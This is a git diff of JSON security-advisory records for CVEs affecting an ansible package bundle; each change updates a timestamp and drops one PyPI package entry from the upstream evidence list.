diff --git a/advisories/BREW-ansible@13-CVE-2008-0299.json b/advisories/BREW-ansible@13-CVE-2008-0299.json index 90f1e1d58d..cdc4049f11 100644 --- a/advisories/BREW-ansible@13-CVE-2008-0299.json +++ b/advisories/BREW-ansible@13-CVE-2008-0299.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2008-0299", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wqmm-q65g-2hqr", "CVE-2008-0299", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2010-4340.json b/advisories/BREW-ansible@13-CVE-2010-4340.json index fd59a6c27b..cdc12b21eb 100644 --- a/advisories/BREW-ansible@13-CVE-2010-4340.json +++ b/advisories/BREW-ansible@13-CVE-2010-4340.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2010-4340", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w3j6-8j34-q43x", "CVE-2010-4340", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2012-3446.json b/advisories/BREW-ansible@13-CVE-2012-3446.json index 2de7b9d654..794063e4aa 100644 --- a/advisories/BREW-ansible@13-CVE-2012-3446.json +++ b/advisories/BREW-ansible@13-CVE-2012-3446.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2012-3446", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-prcq-52f8-fp44", "CVE-2012-3446", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-1633.json b/advisories/BREW-ansible@13-CVE-2013-1633.json index e2c3b33580..60e563424a 100644 --- a/advisories/BREW-ansible@13-CVE-2013-1633.json +++ b/advisories/BREW-ansible@13-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-1633", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2013.json b/advisories/BREW-ansible@13-CVE-2013-2013.json index cbfb342978..6ff3ec3ca7 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2013.json +++ b/advisories/BREW-ansible@13-CVE-2013-2013.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2013", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8q2m-pwxf-jc7g", "CVE-2013-2013", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2030.json b/advisories/BREW-ansible@13-CVE-2013-2030.json index 44f581d91f..8b1c4ffb3d 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2030.json +++ b/advisories/BREW-ansible@13-CVE-2013-2030.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2030", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pxxv-rv32-2qgv", "CVE-2013-2030", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2104.json b/advisories/BREW-ansible@13-CVE-2013-2104.json index 28faf0e2a8..2da33ef60c 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2104.json +++ b/advisories/BREW-ansible@13-CVE-2013-2104.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2104", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4rrr-j7ff-r844", "CVE-2013-2104", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2166.json b/advisories/BREW-ansible@13-CVE-2013-2166.json index 0c890292ce..4b457f8f1e 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2166.json +++ b/advisories/BREW-ansible@13-CVE-2013-2166.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2166", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-c3xq-cj8f-7829", "CVE-2013-2166", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2167.json b/advisories/BREW-ansible@13-CVE-2013-2167.json index d0692c101c..98b184dd3f 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2167.json +++ b/advisories/BREW-ansible@13-CVE-2013-2167.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2167", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9vg3-cf92-h2h7", "CVE-2013-2167", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2233.json b/advisories/BREW-ansible@13-CVE-2013-2233.json index 3bff51f69b..7deb5d2eb2 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2233.json +++ b/advisories/BREW-ansible@13-CVE-2013-2233.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2233", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9x6q-5423-w5v9", "CVE-2013-2233", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2255.json b/advisories/BREW-ansible@13-CVE-2013-2255.json index 89934e4d2c..1b2db31243 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2255.json +++ b/advisories/BREW-ansible@13-CVE-2013-2255.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2255", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qh2x-hpf9-cf2g", "CVE-2013-2255", @@ -45,14 +45,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-4259.json b/advisories/BREW-ansible@13-CVE-2013-4259.json index dcfc77a67d..d8353eec05 100644 --- a/advisories/BREW-ansible@13-CVE-2013-4259.json +++ b/advisories/BREW-ansible@13-CVE-2013-4259.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-4259", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fj24-ghp9-39v3", "CVE-2013-4259", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-4260.json b/advisories/BREW-ansible@13-CVE-2013-4260.json index e795159c3f..a5a3a55d4f 100644 --- a/advisories/BREW-ansible@13-CVE-2013-4260.json +++ b/advisories/BREW-ansible@13-CVE-2013-4260.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-4260", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pcqv-c46v-2p4v", "CVE-2013-4260", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-6480.json b/advisories/BREW-ansible@13-CVE-2013-6480.json index 315c511f09..61f9544c6d 100644 --- a/advisories/BREW-ansible@13-CVE-2013-6480.json +++ b/advisories/BREW-ansible@13-CVE-2013-6480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-6480", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g892-9h8m-r69r", "CVE-2013-6480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-0012.json b/advisories/BREW-ansible@13-CVE-2014-0012.json index 6cd9651aae..f9aea0b088 100644 --- a/advisories/BREW-ansible@13-CVE-2014-0012.json +++ b/advisories/BREW-ansible@13-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-0012", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-0105.json b/advisories/BREW-ansible@13-CVE-2014-0105.json index 952839e355..052994c006 100644 --- a/advisories/BREW-ansible@13-CVE-2014-0105.json +++ b/advisories/BREW-ansible@13-CVE-2014-0105.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-0105", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gwvq-rgqf-993f", "CVE-2014-0105", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-1402.json b/advisories/BREW-ansible@13-CVE-2014-1402.json index 24ac75703b..429a1d259c 100644 --- a/advisories/BREW-ansible@13-CVE-2014-1402.json +++ b/advisories/BREW-ansible@13-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-1402", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-1829.json b/advisories/BREW-ansible@13-CVE-2014-1829.json index e43042eb80..ecb75af79f 100644 --- a/advisories/BREW-ansible@13-CVE-2014-1829.json +++ b/advisories/BREW-ansible@13-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-1829", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-1830.json b/advisories/BREW-ansible@13-CVE-2014-1830.json index 4792985080..c10d7a68dc 100644 --- a/advisories/BREW-ansible@13-CVE-2014-1830.json +++ b/advisories/BREW-ansible@13-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-1830", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-2686.json b/advisories/BREW-ansible@13-CVE-2014-2686.json index 8a63878dce..c23f7748cc 100644 --- a/advisories/BREW-ansible@13-CVE-2014-2686.json +++ b/advisories/BREW-ansible@13-CVE-2014-2686.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-2686", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-49m5-2838-q2rv", "CVE-2014-2686", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-3146.json b/advisories/BREW-ansible@13-CVE-2014-3146.json index c286a1efdd..1c039e6e83 100644 --- a/advisories/BREW-ansible@13-CVE-2014-3146.json +++ b/advisories/BREW-ansible@13-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-3146", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-3498.json b/advisories/BREW-ansible@13-CVE-2014-3498.json index e23c790ea2..74b37ef37a 100644 --- a/advisories/BREW-ansible@13-CVE-2014-3498.json +++ b/advisories/BREW-ansible@13-CVE-2014-3498.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-3498", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4cvm-5776-jx9f", "CVE-2014-3498", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4657.json b/advisories/BREW-ansible@13-CVE-2014-4657.json index 2faa4ce020..914f82bd7b 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4657.json +++ b/advisories/BREW-ansible@13-CVE-2014-4657.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4657", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qg47-5px9-32g7", "CVE-2014-4657", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4658.json b/advisories/BREW-ansible@13-CVE-2014-4658.json index 15f2e973d8..4f47b2ece5 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4658.json +++ b/advisories/BREW-ansible@13-CVE-2014-4658.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4658", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5g4v-2pc6-4hh4", "CVE-2014-4658", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4659.json b/advisories/BREW-ansible@13-CVE-2014-4659.json index da75bc8057..3c058489f6 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4659.json +++ b/advisories/BREW-ansible@13-CVE-2014-4659.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4659", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6667-f46p-pg88", "CVE-2014-4659", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4660.json b/advisories/BREW-ansible@13-CVE-2014-4660.json index 7a12c7bd7c..4b7945cdd1 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4660.json +++ b/advisories/BREW-ansible@13-CVE-2014-4660.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4660", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5xm4-jmpw-p6j3", "CVE-2014-4660", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4678.json b/advisories/BREW-ansible@13-CVE-2014-4678.json index ac0a6a889e..6972e3b7e7 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4678.json +++ b/advisories/BREW-ansible@13-CVE-2014-4678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4678", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-66c7-5pwv-mm3j", "CVE-2014-4678", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4966.json b/advisories/BREW-ansible@13-CVE-2014-4966.json index 67ecedebdd..cf64624335 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4966.json +++ b/advisories/BREW-ansible@13-CVE-2014-4966.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4966", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wqq5-c89p-3wc3", "CVE-2014-4966", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4967.json b/advisories/BREW-ansible@13-CVE-2014-4967.json index 8b2b0792e8..7bd621eaa3 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4967.json +++ b/advisories/BREW-ansible@13-CVE-2014-4967.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4967", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-64cw-m57j-65xj", "CVE-2014-4967", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-7144.json b/advisories/BREW-ansible@13-CVE-2014-7144.json index 2e84888ba6..29668fba57 100644 --- a/advisories/BREW-ansible@13-CVE-2014-7144.json +++ b/advisories/BREW-ansible@13-CVE-2014-7144.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-7144", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-7f2c-vp52-gmfw", "CVE-2014-7144", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-7231.json b/advisories/BREW-ansible@13-CVE-2014-7231.json index 87a9a1210b..a9a076160c 100644 --- a/advisories/BREW-ansible@13-CVE-2014-7231.json +++ b/advisories/BREW-ansible@13-CVE-2014-7231.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-7231", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v933-vx5p-j7w2", "CVE-2014-7231", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oslo-utils", - "subject_version": "10.1.1", - "key": "pkg:pypi/oslo-utils@10.1.1", - "resource": "oslo-utils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-1852.json b/advisories/BREW-ansible@13-CVE-2015-1852.json index 3150f0273d..471f9324a5 100644 --- a/advisories/BREW-ansible@13-CVE-2015-1852.json +++ b/advisories/BREW-ansible@13-CVE-2015-1852.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-1852", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p9wq-mjh8-q72m", "CVE-2015-1852", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-2296.json b/advisories/BREW-ansible@13-CVE-2015-2296.json index b4f3debb1e..31f7f778c6 100644 --- a/advisories/BREW-ansible@13-CVE-2015-2296.json +++ b/advisories/BREW-ansible@13-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-2296", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-3206.json b/advisories/BREW-ansible@13-CVE-2015-3206.json index 0617ecfe9e..608148d9dc 100644 --- a/advisories/BREW-ansible@13-CVE-2015-3206.json +++ b/advisories/BREW-ansible@13-CVE-2015-3206.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-3206", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mffc-9gx5-99g3", "CVE-2015-3206", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "kerberos", - "subject_version": "1.3.1", - "key": 